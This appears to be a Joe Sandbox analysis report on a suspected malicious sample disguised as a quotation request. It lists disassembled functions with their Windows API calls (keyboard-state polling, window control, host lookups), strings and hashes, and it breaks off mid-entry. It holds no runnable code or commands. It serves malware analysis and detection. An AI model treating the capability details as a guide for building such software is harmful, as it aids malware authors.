Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 26a50182f47588fda1d89e6b4d9feb1b8bbfcacfddd5b73f74211b1ffff4c1be
Instruction ID: 736d98169a21622e06da57a78217aabaf552eda9ae5e076a2a73c956ca164dab
Opcode Fuzzy Hash: 26a50182f47588fda1d89e6b4d9feb1b8bbfcacfddd5b73f74211b1ffff4c1be
Instruction Fuzzy Hash: A61105315002196BDB61AA349C4AEFF7BBCEF42311F0001AAF5C5DA061EF798981C750

Function 01034F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 01034F7A

Part of subcall function 00FF049F: timeGetTime.WINMM(?,75A8B400,00FE0E7B), ref: 00FF04A3

Sleep.KERNEL32(0000000A), ref: 01034FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 01034FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 01034FEC
SetActiveWindow.USER32 ref: 0103500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 01035019
SendMessageW.USER32(00000010,00000000,00000000), ref: 01035038
Sleep.KERNEL32(000000FA), ref: 01035043
IsWindow.USER32 ref: 0103504F
EndDialog.USER32(00000000), ref: 01035060

Strings

BUTTON, xrefs: 01034FDE

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 22c62ac847ce5be3cbf6916a0875264d21656e9e1bd75f8e2c82eb91778b2fab
Instruction ID: f987fb31edc589b5390cdd2edb2885bf9076feffcc8416eb68b22318887fabcb
Opcode Fuzzy Hash: 22c62ac847ce5be3cbf6916a0875264d21656e9e1bd75f8e2c82eb91778b2fab
Instruction Fuzzy Hash: 47215070204206AFE7315F35EC98B2B7BADFB8B745F091014F2C5861A9DB6F8D509761

Function 0103D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC

CoInitialize.OLE32(00000000), ref: 0103D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0103D67D
SHGetDesktopFolder.SHELL32(?), ref: 0103D691
CoCreateInstance.OLE32(01062D7C,00000000,00000001,01088C1C,?), ref: 0103D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0103D74C
CoTaskMemFree.OLE32(?,?), ref: 0103D7A4
_memset.LIBCMT ref: 0103D7E1
SHBrowseForFolderW.SHELL32(?), ref: 0103D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0103D840
CoTaskMemFree.OLE32(00000000), ref: 0103D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0103D87E
CoUninitialize.OLE32(00000001,00000000), ref: 0103D880

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 0609755ad4ddbeb090c79f3ce8d928822796f15daeaa95bcca0c04be9f14f71f
Instruction ID: 5a7eb7bf748676967966bd5e051c0a5e3eff2ea08d14a28ec2ce63dc201981a9
Opcode Fuzzy Hash: 0609755ad4ddbeb090c79f3ce8d928822796f15daeaa95bcca0c04be9f14f71f
Instruction Fuzzy Hash: 1CB11B75A00209AFDB04DFA4C888DAEBBF9FF88314F148499E949EB251DB35ED41DB50

Function 0102C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0102C283
GetWindowRect.USER32(00000000,?), ref: 0102C295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0102C2F3
GetDlgItem.USER32(?,00000002), ref: 0102C2FE
GetWindowRect.USER32(00000000,?), ref: 0102C310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0102C364
GetDlgItem.USER32(?,000003E9), ref: 0102C372
GetWindowRect.USER32(00000000,?), ref: 0102C383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0102C3C6
GetDlgItem.USER32(?,000003EA), ref: 0102C3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0102C3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 0102C3FE

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 578770f04baf3c24b387d9109eb359adda2e0c6e0063bb7bf56524b8a445aa52
Instruction ID: 17953bcb2d62aadc9fef68bd371ee5faca215f324c6bd3dc989590b9704cb3d3
Opcode Fuzzy Hash: 578770f04baf3c24b387d9109eb359adda2e0c6e0063bb7bf56524b8a445aa52
Instruction Fuzzy Hash: 2D516171B00205ABDB18CFADDD89A6EBBB9EB88310F14856DF515D7294DB7599008B10

Function 00FD201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FD2036,?,00000000,?,?,?,?,00FD16CB,00000000,?), ref: 00FD1B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00FD20D3
KillTimer.USER32(-00000001,?,?,?,?,00FD16CB,00000000,?,?,00FD1AE2,?,?), ref: 00FD216E
DestroyAcceleratorTable.USER32(00000000), ref: 0100BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FD16CB,00000000,?,?,00FD1AE2,?,?), ref: 0100BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FD16CB,00000000,?,?,00FD1AE2,?,?), ref: 0100BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FD16CB,00000000,?,?,00FD1AE2,?,?), ref: 0100BD0A
DeleteObject.GDI32(00000000), ref: 0100BD1C

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 571f70944787597d21982e2f19a07e885a676c95c4e3e781c4f1cf4b9092b544
Instruction ID: 595f3bf3343769f62b45bb3d48b5de712d32114cc4c6f1523b7efae26d0d3271
Opcode Fuzzy Hash: 571f70944787597d21982e2f19a07e885a676c95c4e3e781c4f1cf4b9092b544
Instruction Fuzzy Hash: 1C61E135504701DFDB76AF19D858B2AB7F2FF50312F18841BE1C25B6A4C77AA881EB81

Function 00FD21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00FD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FD25EC

GetSysColor.USER32(0000000F), ref: 00FD21D3

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: dd6ce67b00c360bbf61be0a523a4c63005d0de3b6ba125be56ab530e9a9477e1
Instruction ID: d0617f74fdceb1b888ef93cdac3476a90697b76be749442de5f6437b60172118
Opcode Fuzzy Hash: dd6ce67b00c360bbf61be0a523a4c63005d0de3b6ba125be56ab530e9a9477e1
Instruction Fuzzy Hash: 7B41BC354042409FEF665F28DC48BB93B66EB16332F184356FEA58B2D5C7368C41EB61

Function 0103A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0105F910), ref: 0103A90B
GetDriveTypeW.KERNEL32(00000061,010889A0,00000061), ref: 0103A9D5
_wcscpy.LIBCMT ref: 0103A9FF

Strings

fixed, xrefs: 0103A953
network, xrefs: 0103A969
unknown, xrefs: 0103A996
all, xrefs: 0103A911
removable, xrefs: 0103A93D
cdrom, xrefs: 0103A927
ramdisk, xrefs: 0103A97F

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 9d7f68ff646497c7a4674c6a01c0e08bb2ecba4a347a96d143505a3c6dfdf7de
Instruction ID: cfe52b22864e2ef5afb0056c1f81ac7d3ce7eaf94f0a1f6b204f9f7549db78c4
Opcode Fuzzy Hash: 9d7f68ff646497c7a4674c6a01c0e08bb2ecba4a347a96d143505a3c6dfdf7de
Instruction Fuzzy Hash: 56519C352183019BC300EF14CD92AAFB7EAFF84740F48485EF5D5AB2A2DB759909CA52

Function 00FD9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00FD9862
__swprintf.LIBCMT ref: 00FD98AC
__i64tow.LIBCMT ref: 0100F5E6

Strings

%.15g, xrefs: 00FD98A6
False, xrefs: 0100F5AE
0x%p, xrefs: 0100F5C8
True, xrefs: 0100F5A7

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: d90c77ab947f17150866c63d514df57ba01fd37debc200f5db34d0714bcf635e
Instruction ID: 6cc1b7422c8d38d06c675051e1fcd8c9dbb18da2bf4d3ae414687b5082378cf2
Opcode Fuzzy Hash: d90c77ab947f17150866c63d514df57ba01fd37debc200f5db34d0714bcf635e
Instruction Fuzzy Hash: 4B41297150420A9FEB25DF78DC42E7A77E9EF05700F2444AFE689CB392EA769901B710

Function 01057152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0105716A
CreateMenu.USER32 ref: 01057185
SetMenu.USER32(?,00000000), ref: 01057194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01057221
IsMenu.USER32(?), ref: 01057237
CreatePopupMenu.USER32 ref: 01057241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0105726E
DrawMenuBar.USER32 ref: 01057276

Strings

F, xrefs: 01057262
0, xrefs: 01057160

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: e061f2ecdf6838ac3ed90e1f5eab84f0d861ee0b2ef59c2901c7ad271e37bc34
Instruction ID: 76a394c2a260d7a13ae01b9f43292ea24f4f66ffd94359b021874a8b77c11846
Opcode Fuzzy Hash: e061f2ecdf6838ac3ed90e1f5eab84f0d861ee0b2ef59c2901c7ad271e37bc34
Instruction Fuzzy Hash: DA414574A01209AFDB61DF68D884E9ABBF5FF08350F144069FE85A7351D736A910DB90

Function 010574BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0105755E
CreateCompatibleDC.GDI32(00000000), ref: 01057565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 01057578
SelectObject.GDI32(00000000,00000000), ref: 01057580
GetPixel.GDI32(00000000,00000000,00000000), ref: 0105758B
DeleteDC.GDI32(00000000), ref: 01057594
GetWindowLongW.USER32(?,000000EC), ref: 0105759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 010575B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 010575BE

Strings

static, xrefs: 010574F6

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 3f90998b8ebb5936406213ddc7976195d59e591fd07e4881cb409ffb08d87716
Instruction ID: ee28f2efc9fbf0bbea967d4dc6b39402e49a043815530130ca62777c450ad628
Opcode Fuzzy Hash: 3f90998b8ebb5936406213ddc7976195d59e591fd07e4881cb409ffb08d87716
Instruction Fuzzy Hash: E4315A72101216ABDF629F68DC08FDB3BA9FF09364F110215FA9596190CB7AD811DBA4

Function 00FF6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FF6E3E

Part of subcall function 00FF8B28: __getptd_noexit.LIBCMT ref: 00FF8B28

__gmtime64_s.LIBCMT ref: 00FF6ED7
__gmtime64_s.LIBCMT ref: 00FF6F0D
__gmtime64_s.LIBCMT ref: 00FF6F2A
__allrem.LIBCMT ref: 00FF6F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FF6F9C
__allrem.LIBCMT ref: 00FF6FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FF6FD1
__allrem.LIBCMT ref: 00FF6FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FF7006
__invoke_watson.LIBCMT ref: 00FF7077

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: 66bae7601b4116fa0d7b1a8eb6a80517846498271fbce7dddb163498c1469da8
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: 2E711876E0071BABE715AF68DC41BBAB7A8AF14734F14422AE614E72D0EF70DD409790

Function 01032527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01032542
GetMenuItemInfoW.USER32(01095890,000000FF,00000000,00000030), ref: 010325A3
SetMenuItemInfoW.USER32(01095890,00000004,00000000,00000030), ref: 010325D9
Sleep.KERNEL32(000001F4), ref: 010325EB
GetMenuItemCount.USER32(?), ref: 0103262F
GetMenuItemID.USER32(?,00000000), ref: 0103264B
GetMenuItemID.USER32(?,-00000001), ref: 01032675
GetMenuItemID.USER32(?,?), ref: 010326BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 01032700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01032714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01032735

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: d353596a91f2ad49d585d00a095c5d093a7b03e6652c31b1a4a0259b94862edf
Instruction ID: abb67981537220ccea233c10ff1bd384a52c7388e78f7cb33a6a61911ff1c0d4
Opcode Fuzzy Hash: d353596a91f2ad49d585d00a095c5d093a7b03e6652c31b1a4a0259b94862edf
Instruction Fuzzy Hash: 8A61817490024AAFDB22DF68D988DBF7BBCFF85304F140499E9C2A7251D736A905DB21

Function 01056F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01056FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01056FA8
GetWindowLongW.USER32(?,000000F0), ref: 01056FCC
_memset.LIBCMT ref: 01056FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01056FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01057067

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 602ec4ccce10a371ddb8636cda9f83dff5f92b16a0947cff42ae3d7da46c4f96
Instruction ID: c0736cda12637e23ac1e64482e08798dc9ec1dd24855a43fed18894ac1352da3
Opcode Fuzzy Hash: 602ec4ccce10a371ddb8636cda9f83dff5f92b16a0947cff42ae3d7da46c4f96
Instruction Fuzzy Hash: DC618E75900208AFDB11DFA8CC80EEF77F9EF09710F50019AFA54AB291C775A941DBA0

Function 01026B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 01026BBF
SafeArrayAllocData.OLEAUT32(?), ref: 01026C18
VariantInit.OLEAUT32(?), ref: 01026C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 01026C4A
VariantCopy.OLEAUT32(?,?), ref: 01026C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 01026CB1
VariantClear.OLEAUT32(?), ref: 01026CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 01026CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 01026CDC
VariantClear.OLEAUT32(?), ref: 01026CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 01026CF9

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: e06e683ddab3b3461b92e2b3ba8019b6d6dd09d4a68701556d19f482d37c68b0
Instruction ID: 1fb1d93079246cf2e21e666322980c226a287e396860f0089e8d2cf37520a684
Opcode Fuzzy Hash: e06e683ddab3b3461b92e2b3ba8019b6d6dd09d4a68701556d19f482d37c68b0
Instruction Fuzzy Hash: D8413175D0021E9FCF10EFA8D8449EEBFB9EF08354F108069E995A7251CB3AA945CF90

Function 0102FD09 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0102FD31
GetAsyncKeyState.USER32(000000A0), ref: 0102FDB2
GetKeyState.USER32(000000A0), ref: 0102FDCD
GetAsyncKeyState.USER32(000000A1), ref: 0102FDE7
GetKeyState.USER32(000000A1), ref: 0102FDFC
GetAsyncKeyState.USER32(00000011), ref: 0102FE14
GetKeyState.USER32(00000011), ref: 0102FE26
GetAsyncKeyState.USER32(00000012), ref: 0102FE3E
GetKeyState.USER32(00000012), ref: 0102FE50
GetAsyncKeyState.USER32(0000005B), ref: 0102FE68
GetKeyState.USER32(0000005B), ref: 0102FE7A

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 9d031e0bafc1ad5d3c9e3c14dbbb2365eeac8fa3886f31eb727850b9ecc6baff
Instruction ID: 3b301d789f7501dfad777633abdc260569f8fb0af1264303efe75245dbbf0833
Opcode Fuzzy Hash: 9d031e0bafc1ad5d3c9e3c14dbbb2365eeac8fa3886f31eb727850b9ecc6baff
Instruction Fuzzy Hash: C741D6745047DB69FFB3AA6884043B6BEF16F01784F0840D9D6D6871C3EBE995C887A2

Function 010483BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

